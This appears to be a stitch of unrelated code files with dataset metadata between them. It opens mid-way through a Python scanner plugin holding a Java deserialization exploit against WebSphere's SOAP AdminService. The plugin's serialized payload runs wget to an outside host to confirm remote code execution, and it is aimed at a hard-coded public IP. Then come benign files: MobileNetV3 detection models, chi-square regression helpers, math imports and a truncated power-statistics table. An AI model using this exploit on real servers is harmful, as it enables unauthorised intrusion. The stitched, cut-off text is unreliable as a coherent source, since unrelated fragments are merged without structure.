x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4d\x65\x74\x68\x6f\x64\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\xa0\xf0\xa4\x38\x7a\x3b\xb3\x42\x02\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1e\x73\x71\x00\x7e\x00\x16\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x02\x70\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x00\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1b\x73\x71\x00\x7e\x00\x16\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00\x54\x77\x67\x65\x74\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x79\x73\x61\x6e\x64\x62\x6f\x78\x2e\x73\x69\x6e\x61\x61\x70\x70\x2e\x63\x6f\x6d\x2f\x6b\x76\x3f\x61\x63\x74\x3d\x73\x65\x74\x26\x6b\x3d\x6a\x61\x76\x61\x75\x6e\x6a\x62\x6f\x73\x73\x61\x30\x62\x39\x32\x33\x38\x32\x30\x64\x63\x63\x35\x30\x39\x61\x26\x76\x3d\x6a\x61\x76\x61\x75\x6e\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x01\x71\x00\x7e\x00\x23\x73\x71\x00\x7e\x00\x11\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x78\x70\x00\x00\x00\x01\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x00\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x76\x72\x00\x12\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x76\x65\x72\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x71\x00\x7e\x00\x3a"
    # Replace the placeholder key suffix with this run's random marker.
    p = p.replace("a0b923820dcc509a",flag)
    # Payload is base64-encoded for transport inside the SOAP body.
    b64 = base64.b64encode(p)
    # Raw SOAP request to the AdminService; the ObjectName field carries the
    # base64 payload, which the server deserializes.
    raw = """
POST / HTTP/1.0
Host: 127.0.0.1:8880
Content-Type: text/xml; charset=utf-8
Content-Length: 2646
SOAPAction: "urn:AdminService"
<?xml version='1.0' encoding='UTF-8'?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<SOAP-ENV:Header xmlns:ns0="admin" ns0:WASRemoteRuntimeVersion="8.5.5.1" ns0:JMXMessageVersion="1.2.0" ns0:SecurityEnabled="true" ns0:JMXVersion="1.2.0">
<LoginMethod>BasicAuth</LoginMethod>
</SOAP-ENV:Header>
<SOAP-ENV:Body>
<ns1:getAttribute xmlns:ns1="urn:AdminService" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<objectname xsi:type="ns1:javax.management.ObjectName">%s</objectname>
<attribute xsi:type="xsd:string">ringBufferSize</attribute>
</ns1:getAttribute>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
""" % b64
    # Fire the exploit request at the target.
    code, head, body, errcode, final_url = curl.curl2(target,raw=raw)
    # If the gadget ran, the sandbox now stores our marker key; read it back.
    check = "https://pysandbox.sinaapp.com/kv?act=get&k=javaunjbossa0b923820dcc509a".replace("a0b923820dcc509a",flag)
    code, head, body, errcode, final_url = curl.curl2(check)
    # 'None' in the body means the key was never set, i.e. no code execution.
    if 'javaun' in body and not 'None' in body:
        security_hole(target + ' has java unserialize rce.')
if __name__ == '__main__':
    # Standalone run: pull the scanner stubs (curl, security_hole, ...) from
    # the dummy test harness, then audit a hard-coded sample target. [1] picks
    # the URL out of assign()'s (True, arg) tuple.
    from dummy import *
    audit(assign('websphere', 'http://211.140.31.239:80/')[1])
| 158.4
| 5,915
| 0.734975
| 1,754
| 7,920
| 3.305587
| 0.168757
| 0.073474
| 0.072956
| 0.06209
| 0.557951
| 0.520352
| 0.489997
| 0.457917
| 0.430493
| 0.369955
| 0
| 0.33691
| 0.034975
| 7,920
| 50
| 5,916
| 158.4
| 0.421693
| 0.033712
| 0
| 0
| 0
| 0.1
| 0.917237
| 0.814342
| 0
| 1
| 0
| 0
| 0
| 1
| 0.05
| false
| 0
| 0.075
| 0
| 0.15
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7ebe60c4477f6f79bbef103c5cceda0fe284bc0c
| 5,527
|
py
|
Python
|
ModelMobilenetV3.py
|
mhyzy155/02456DeepLearningObjDet
|
efd49590dad6c60654ceb532ee0b10d1d5093db2
|
[
"Apache-2.0"
] | null | null | null |
ModelMobilenetV3.py
|
mhyzy155/02456DeepLearningObjDet
|
efd49590dad6c60654ceb532ee0b10d1d5093db2
|
[
"Apache-2.0"
] | null | null | null |
ModelMobilenetV3.py
|
mhyzy155/02456DeepLearningObjDet
|
efd49590dad6c60654ceb532ee0b10d1d5093db2
|
[
"Apache-2.0"
] | null | null | null |
import torchvision.models as models
from torchvision.models.detection.rpn import AnchorGenerator
from torchvision.ops import MultiScaleRoIAlign
from torchvision.models.detection import FasterRCNN
class ModelMobileNetV3:
    """Factory for a Faster R-CNN detector on a MobileNetV3-Small backbone."""

    @classmethod
    def get_model(cls, num_classes):
        """Build and return the detector for `num_classes` output classes."""
        # Use only the convolutional feature extractor of a pre-trained
        # classifier. FasterRCNN needs the backbone's output channel count;
        # mobilenet_v3_small's final feature map has 576 channels.
        trunk = models.mobilenet_v3_small(pretrained=True).features
        trunk.out_channels = 576

        # 5 sizes x 3 aspect ratios = 15 anchors per spatial location. The
        # nested tuples allow one entry per feature map (a single map here).
        anchors = AnchorGenerator(
            sizes=((32, 64, 128, 256, 512),),
            aspect_ratios=((0.5, 1.0, 2.0),),
        )
        #anchors = AnchorGenerator(sizes=((128, 256, 512),),
        #                          aspect_ratios=((0.5, 1.0, 2.0),))

        # RoI cropping over feature map '0' — the key torchvision assigns when
        # the backbone returns a plain Tensor rather than an OrderedDict.
        pooler = MultiScaleRoIAlign(
            featmap_names=['0'],
            output_size=7,
            sampling_ratio=2,
        )

        # Assemble the detector; the small proposal budgets (20 train /
        # 10 test, pre- and post-NMS) keep the RPN cheap.
        detector = FasterRCNN(
            trunk,
            num_classes=num_classes,
            rpn_anchor_generator=anchors,
            box_roi_pool=pooler,
            rpn_pre_nms_top_n_train=20,
            rpn_pre_nms_top_n_test=10,
            rpn_post_nms_top_n_train=20,
            rpn_post_nms_top_n_test=10,
        )
        #detector.roi_heads.mask_predictor = None
        return detector
class ModelMobileNetV3L:
    """Factory for a Faster R-CNN detector on a MobileNetV3-Large backbone."""

    @classmethod
    def get_model(cls, num_classes):
        """Build and return the detector for `num_classes` output classes."""
        # Pre-trained feature extractor; mobilenet_v3_large's final feature
        # map has 960 channels, which FasterRCNN must be told about.
        trunk = models.mobilenet_v3_large(pretrained=True).features
        trunk.out_channels = 960

        # 5 sizes x 3 aspect ratios per location, single feature map.
        anchors = AnchorGenerator(
            sizes=((32, 64, 128, 256, 512),),
            aspect_ratios=((0.5, 1.0, 2.0),),
        )

        # RoI cropping over the single Tensor feature map ('0').
        pooler = MultiScaleRoIAlign(
            featmap_names=['0'],
            output_size=7,
            sampling_ratio=2,
        )

        # Small proposal budgets (20 train / 10 test) keep the RPN cheap.
        return FasterRCNN(
            trunk,
            num_classes=num_classes,
            rpn_anchor_generator=anchors,
            box_roi_pool=pooler,
            rpn_pre_nms_top_n_train=20,
            rpn_pre_nms_top_n_test=10,
            rpn_post_nms_top_n_train=20,
            rpn_post_nms_top_n_test=10,
        )
class ModelMobileNetV3L_int8:
    """Factory for a Faster R-CNN detector on the quantization-ready
    MobileNetV3-Large backbone (weights not pre-loaded)."""

    @classmethod
    def get_model(cls, num_classes):
        """Build and return the detector for `num_classes` output classes."""
        # Quantization-capable variant of the backbone; pretrained=False, so
        # weights are expected to be loaded/trained elsewhere. Its final
        # feature map has 960 channels, which FasterRCNN must be told about.
        trunk = models.quantization.mobilenet_v3_large(pretrained=False).features
        trunk.out_channels = 960

        # 5 sizes x 3 aspect ratios = 15 anchors per spatial location; one
        # nested tuple per feature map (a single map here).
        anchors = AnchorGenerator(
            sizes=((32, 64, 128, 256, 512),),
            aspect_ratios=((0.5, 1.0, 2.0),),
        )
        #anchors = AnchorGenerator(sizes=((128, 256, 512),),
        #                          aspect_ratios=((0.5, 1.0, 2.0),))

        # RoI cropping over feature map '0' — the key used when the backbone
        # returns a plain Tensor rather than an OrderedDict.
        pooler = MultiScaleRoIAlign(
            featmap_names=['0'],
            output_size=7,
            sampling_ratio=2,
        )

        # Small proposal budgets (20 train / 10 test, pre- and post-NMS).
        detector = FasterRCNN(
            trunk,
            num_classes=num_classes,
            rpn_anchor_generator=anchors,
            box_roi_pool=pooler,
            rpn_pre_nms_top_n_train=20,
            rpn_pre_nms_top_n_test=10,
            rpn_post_nms_top_n_train=20,
            rpn_post_nms_top_n_test=10,
        )
        #detector.roi_heads.mask_predictor = None
        return detector
| 47.239316
| 85
| 0.574091
| 654
| 5,527
| 4.649847
| 0.233945
| 0.023676
| 0.027622
| 0.023676
| 0.866491
| 0.866491
| 0.866491
| 0.854982
| 0.854982
| 0.854982
| 0
| 0.04418
| 0.361136
| 5,527
| 116
| 86
| 47.646552
| 0.817049
| 0.355889
| 0
| 0.819672
| 0
| 0
| 0.000882
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04918
| false
| 0
| 0.065574
| 0
| 0.213115
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
adaee3da37d023c6bb22111ceded9201e1bfb6c3
| 6,047
|
py
|
Python
|
regression.py
|
bguphysicslab/bgu_physics_lab_b
|
5dad736db15d79eea254a0056587d8e60854ff6d
|
[
"MIT"
] | null | null | null |
regression.py
|
bguphysicslab/bgu_physics_lab_b
|
5dad736db15d79eea254a0056587d8e60854ff6d
|
[
"MIT"
] | null | null | null |
regression.py
|
bguphysicslab/bgu_physics_lab_b
|
5dad736db15d79eea254a0056587d8e60854ff6d
|
[
"MIT"
] | null | null | null |
from matplotlib.offsetbox import AnchoredText
import numpy as np
import matplotlib.pyplot as plt
from iminuit import Minuit, describe
from iminuit.util import make_func_code
class Chi2Reg:  # like probfit's Chi2Regression, but also carries dx
    """Chi-square cost function for iminuit using y-uncertainties only.

    The x-uncertainties (dx) are stored and drawn in the error bars of
    show(), but do not enter the chi-square itself (see EffVarChi2Reg for
    that).
    """

    def __init__(self, model, x, y, dx, dy):
        """Store the data arrays and expose the model's parameter names."""
        self.model = model            # model(x, *par) -> predicted y
        self.x = np.array(x)          # abscissa values
        self.y = np.array(y)          # measured ordinates
        self.dx = np.array(dx)        # x-axis uncertainties (plotting only)
        self.dy = np.array(dy)        # y-axis uncertainties
        # iminuit inspects func_code to discover the fit-parameter names
        # (drop the leading 'x' argument of the model).
        self.func_code = make_func_code(describe(self.model)[1:])

    def __call__(self, *par):
        """Return sum((y - model(x, *par))^2 / dy^2)."""
        self.ym = self.model(self.x, *par)
        residual = self.y - self.ym
        return sum(residual ** 2 / self.dy ** 2)

    def show(self, optimizer, x_title="X", y_title="Y", goodness_loc=2):
        """Plot data with error bars, the fitted curve, and a fit summary box.

        `optimizer` is the fitted iminuit Minuit object; `goodness_loc` is the
        matplotlib AnchoredText location code for the summary box.
        """
        self.par = optimizer.parameters
        self.fit_arg = optimizer.fitarg
        self.chi2 = optimizer.fval
        self.ndof = len(self.x) - len(self.par)
        self.chi_ndof = self.chi2 / self.ndof
        self.par_values = []
        self.par_error = []
        summary = ""
        for name in self.par:
            value = self.fit_arg[name]
            error = self.fit_arg["error_" + name]
            self.par_values.append(value)
            self.par_error.append(error)
            summary += "%s = %0.4f \u00B1 %0.4f \n" % (name, value, error)
        summary += "\u03C7\u00B2 /ndof = %0.4f(%0.4f/%d)" % (self.chi_ndof, self.chi2, self.ndof)
        # Smooth curve of the fitted model over the data's x range.
        self.func_x = np.linspace(self.x[0], self.x[-1], 10000)
        self.y_fit = self.model(self.func_x, *self.par_values)
        plt.rc("font", size=16, family="Times New Roman")
        figure = plt.figure(figsize=(8, 6))
        axes = figure.add_axes([0, 0, 1, 1])
        axes.plot(self.func_x, self.y_fit)
        axes.scatter(self.x, self.y, c="red")
        # Error bars in both axes (dy vertical, dx horizontal).
        axes.errorbar(self.x, self.y, self.dy, self.dx, fmt='none', ecolor='red', capsize=3)
        axes.set_xlabel(x_title, fontdict={"size": 21})
        axes.set_ylabel(y_title, fontdict={"size": 21})
        axes.add_artist(AnchoredText(summary, loc=goodness_loc))
        plt.grid(True)
class EffVarChi2Reg:
    """Chi-square regression that also accounts for x-axis uncertainties.

    Like Chi2Reg, but each point's variance is dy^2 + (df/dx * dx)^2, where
    df/dx is estimated numerically with a forward difference of step ``h``.
    """

    def __init__(self, model, x, y, dx, dy):
        self.model = model  # callable: model(x, *par) -> predicted y
        self.x = np.array(x)  # the x values
        self.y = np.array(y)  # the y values
        self.dx = np.array(dx)  # the x-axis uncertainties
        self.dy = np.array(dy)  # the y-axis uncertainties
        # Expose the model's parameter names (minus x itself) to the optimizer.
        self.func_code = make_func_code(describe(self.model)[1:])
        # Forward-difference step: 1/10000 of the full x span.
        self.h = (x[-1] - x[0]) / 10000

    def __call__(self, *par):  # invoked by the optimizer with trial parameter values
        """Return chi2 with the x uncertainty propagated through df/dx."""
        self.ym = self.model(self.x, *par)
        # df/dx at x is approximated by [f(x + h) - f(x)] / h
        slope = (self.model(self.x + self.h, *par) - self.ym) / self.h
        residual = self.y - self.ym
        variance = self.dy ** 2 + (slope * self.dx) ** 2
        return sum(residual ** 2 / variance)

    def show(self, optimizer, x_title="X", y_title="Y", goodness_loc=2):
        """Plot the data with error bars, the fitted curve, and a goodness-of-fit box.

        *optimizer* is a finished iminuit Minuit object (old API: uses
        ``parameters``, ``fitarg`` and ``fval``).
        """
        self.par = optimizer.parameters
        self.fit_arg = optimizer.fitarg
        self.chi2 = optimizer.fval
        self.ndof = len(self.x) - len(self.par)
        self.chi_ndof = self.chi2 / self.ndof
        self.par_values = []
        self.par_error = []
        pieces = []
        for name in self.par:
            value = self.fit_arg[name]
            error = self.fit_arg["error_" + name]
            self.par_values.append(value)
            self.par_error.append(error)
            pieces.append("%s = %0.4f \u00B1 %0.4f \n" % (name, value, error))
        pieces.append("\u03C7\u00B2 /ndof = %0.4f(%0.4f/%d)" % (self.chi_ndof, self.chi2, self.ndof))
        text = "".join(pieces)
        # Evaluate the fitted model on a dense grid spanning the data range.
        self.func_x = np.linspace(self.x[0], self.x[-1], 10000)
        self.y_fit = self.model(self.func_x, *self.par_values)
        plt.rc("font", size=16, family="Times New Roman")
        fig = plt.figure(figsize=(8, 6))
        ax = fig.add_axes([0, 0, 1, 1])
        ax.plot(self.func_x, self.y_fit)  # fitted curve over the dense grid
        ax.scatter(self.x, self.y, c="red")
        # Positional matplotlib order is yerr first, then xerr.
        ax.errorbar(self.x, self.y, self.dy, self.dx, fmt='none', ecolor='red', capsize=3)
        ax.set_xlabel(x_title, fontdict={"size": 21})
        ax.set_ylabel(y_title, fontdict={"size": 21})
        ax.add_artist(AnchoredText(text, loc=goodness_loc))
        plt.grid(True)
if __name__ == "__main__":
    # Demo: fit a straight line a*x + b to noisy synthetic data and plot it.
    np.random.seed(42)  # reproducible noise
    x_data = np.linspace(1, 6, 5)
    x_err = 0.1 * np.ones(len(x_data))
    y_data = 2 * x_data + np.random.randn(len(x_data))
    y_err = abs(np.random.randn(len(x_data)))

    def fun(X, a, b):
        """Straight-line model; parameter names are introspected by iminuit."""
        return a * X + b

    reg = Chi2Reg(fun, x_data, y_data, x_err, y_err)
    opt = Minuit(reg)
    opt.migrad()
    reg.show(opt)
    plt.show()
| 51.245763
| 150
| 0.601951
| 956
| 6,047
| 3.693515
| 0.183054
| 0.035684
| 0.028321
| 0.016992
| 0.857547
| 0.847918
| 0.847918
| 0.847918
| 0.847918
| 0.847918
| 0
| 0.031834
| 0.257152
| 6,047
| 118
| 151
| 51.245763
| 0.75423
| 0.256491
| 0
| 0.755102
| 0
| 0
| 0.053805
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.061224
| false
| 0
| 0.05102
| 0
| 0.153061
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
adc4263e075498caaff77532766e0b3f32f7b9b4
| 390
|
py
|
Python
|
grayscale/clang/math/__init__.py
|
KennethanCeyer/grayscale
|
646a11ea47f2120f317e554c736d8054aa55c4c4
|
[
"MIT"
] | null | null | null |
grayscale/clang/math/__init__.py
|
KennethanCeyer/grayscale
|
646a11ea47f2120f317e554c736d8054aa55c4c4
|
[
"MIT"
] | null | null | null |
grayscale/clang/math/__init__.py
|
KennethanCeyer/grayscale
|
646a11ea47f2120f317e554c736d8054aa55c4c4
|
[
"MIT"
] | null | null | null |
from grayscale.clang.math.sum import sum as sum
from grayscale.clang.math.mean import mean as mean
from grayscale.clang.math.pow import pow as pow
from grayscale.clang.math.sqrt import sqrt as sqrt
from grayscale.clang.math.std import std as std
from grayscale.clang.math.var import var as var
from grayscale.clang.math.min import min as min
from grayscale.clang.math.max import max as max
| 43.333333
| 50
| 0.815385
| 72
| 390
| 4.416667
| 0.194444
| 0.327044
| 0.45283
| 0.553459
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.123077
| 390
| 8
| 51
| 48.75
| 0.929825
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
adc69075bb9d18fc1f8957ccf51af3d604e6f271
| 68,633
|
py
|
Python
|
benchmarks/SimResults/combinations_spec_rr/oldstuff/cmp_bwavesgccmcfleslie3d/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/combinations_spec_rr/oldstuff/cmp_bwavesgccmcfleslie3d/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/combinations_spec_rr/oldstuff/cmp_bwavesgccmcfleslie3d/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 4.72345e-06,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202693,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 2.02403e-05,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.34756,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.601848,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.345177,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.29459,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.343547,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.54945,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 3.82383e-06,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0125993,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0911113,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0931798,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0911151,
'Execution Unit/Register Files/Runtime Dynamic': 0.105779,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.220164,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.565763,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 2.5742,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00392899,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00392899,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00344044,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.00134186,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00133853,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
